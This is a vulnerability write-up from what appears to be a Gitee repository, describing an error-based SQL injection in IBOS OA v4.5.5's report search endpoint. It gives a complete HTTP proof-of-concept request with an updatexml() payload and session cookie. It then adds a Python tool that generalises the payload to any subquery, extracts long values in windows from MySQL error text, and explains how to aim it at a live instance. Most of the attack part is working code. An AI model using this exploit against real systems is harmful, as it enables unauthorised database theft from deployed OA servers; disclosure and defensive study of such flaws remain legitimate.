wkstestete / cve (Gitee repository, https://gitee.com/wkstestete/cve.git)

ibos sql injection3.md
wkstestete committed on 2023-03-28 04:47: update sql/ibos sql injection3.md.

IBOS OA v4.5.5 SQL injection vulnerability

Download link: https://gitee.com/ibos/IBOS

Vulnerable function: the search box of the Report module (the search request is handled by ?r=report/api/getlist, and the keyword.subject field of the JSON body is injectable).


POC

```http
POST /?r=report/api/getlist HTTP/1.1
Host: www.ibos.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 124
Origin: http://www.ibos.com
Connection: close
Referer: http://www.ibos.com/?r=report/default/index
Cookie: 4tVy_saltkey=JPW119wg; PHPSESSID=0pbgbc7oflgcqf792p92nqo7u0; 4tVy_sid=0r6tzo; lastautologin=0; 4tVy_lastactivity=1679978644; 4tVy_ulastactivity=d9bdiYlHnIPm8Tx0Dnc%2BPNmlkEXAIfB%2BmyV9r5ENIIsFGRSnQdPC; 4tVy_creditremind=0D0D2D0D0D0D1; 4tVy_creditbase=0D4D47D5D0D0; 4tVy_creditrule=%E6%AF%8F%E5%A4%A9%E7%99%BB%E5%BD%95; 4tVy_dropnotify=%7B%22assignment%22%3A%221%22%2C%22email%22%3A%221%22%2C%22officialdoc%22%3A%223%22%2C%22user%22%3A%222%22%2C%22vote%22%3A%222%22%2C%22unread_notify%22%3A9%2C%22unread_atme%22%3A0%2C%22unread_comment%22%3A0%2C%22unread_message%22%3A1%2C%22new_folower_count%22%3A0%2C%22unread_total%22%3A10%7D
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1

{"limit":10,"offset":0,"type":"send","keyword":{"subject":"') AND (updatexml(1,concat(0x7e,(select user()),0x7e),1))-- qw"}}
```

Result: the injected updatexml() call makes MySQL return an XPATH syntax error whose message echoes the result of the injected subquery (user() in this POC; database() or any other scalar can be substituted), which confirms error-based SQL injection. Note that the request requires a logged-in session (see the Cookie header).

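The following is an added example, not code from the original write-up or from the IBOS project. It generalises the POC above: the same updatexml()/concat(0x7e,...,0x7e) trick for an arbitrary scalar subquery, plus the parsing of the leaked value out of the MySQL error text. Because MySQL prints at most 32 characters of the offending XPath expression, values longer than 30 characters must be read in substr() windows; the code does that. The server-side query shape (`(subject LIKE '%...%')`), the table name, and the offline stand-in server that answers with the error text are assumptions made for the example so it runs without a target.

```python
import json
import re

# Assumed shape of the server-side query; a stand-in written for this example,
# not IBOS's actual code. The payload's leading "')" only makes sense if the
# keyword lands inside a quoted, parenthesised LIKE clause like this one.
def build_vulnerable_sql(subject):
    return "SELECT * FROM report WHERE (subject LIKE '%" + subject + "%')"

# The fix: the keyword travels as a bound parameter, never as SQL text.
def build_parameterized_sql(subject):
    return "SELECT * FROM report WHERE subject LIKE %s", ("%" + subject + "%",)

# MySQL shows at most 32 characters of the offending XPath expression in an
# updatexml()/extractvalue() error; after the two "~" markers, 30 characters of
# data fit per request, so longer values are read in 30-character windows.
CHUNK = 30

def make_payload(subquery, offset=1):
    """The page's payload, generalised to any scalar subquery and windowed with substr()."""
    inner = "substr((" + subquery + ")," + str(offset) + "," + str(CHUNK) + ")"
    return "') AND (updatexml(1,concat(0x7e," + inner + ",0x7e),1))-- qw"

def make_request_body(subquery, offset=1):
    """JSON body for POST /?r=report/api/getlist, shaped like the page's request."""
    return json.dumps(
        {"limit": 10, "offset": 0, "type": "send",
         "keyword": {"subject": make_payload(subquery, offset)}},
        separators=(",", ":"))

# The leaked value sits between the "~" markers of the MySQL error text.
ERR_RE = re.compile(r"XPATH syntax error: '~(.*?)~'")

def extract_leak(response_text):
    m = ERR_RE.search(response_text)
    return m.group(1) if m else None

def dump_value(subquery, send):
    """Reassemble a value longer than one window. `send(body)` posts the JSON
    body to the target and returns the response text (any HTTP client will do)."""
    out, offset = "", 1
    while True:
        chunk = extract_leak(send(make_request_body(subquery, offset)))
        if not chunk:            # no error, or an empty window past the end
            break
        out += chunk
        if len(chunk) < CHUNK:   # short window means we reached the end
            break
        offset += CHUNK
    return out

# Offline stand-in for the vulnerable endpoint (constructed for this example):
# it evaluates only the substr() window of the injected payload against a
# constructed secret and answers with the error text MySQL would produce.
SUBSTR_RE = re.compile(r"substr\(\((.*?)\),(\d+),(\d+)\)")

def fake_vulnerable_server(secret):
    def send(body):
        subject = json.loads(body)["keyword"]["subject"]
        m = SUBSTR_RE.search(subject)
        start, length = int(m.group(2)), int(m.group(3))
        window = secret[start - 1:start - 1 + length]  # MySQL substr() is 1-based
        return "XPATH syntax error: '~" + window + "~'"
    return send

if __name__ == "__main__":
    print(build_vulnerable_sql(make_payload("select user()")))
    print(dump_value("select user()", fake_vulnerable_server("root@localhost")))
    # a 45-character constructed value needs two windows
    print(dump_value("select database()", fake_vulnerable_server("x" * 45)))
```

To run it against a real instance, replace `fake_vulnerable_server(...)` with a function that POSTs the body to `/?r=report/api/getlist` with a valid session cookie and returns the response text; the windowing and error parsing stay the same.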
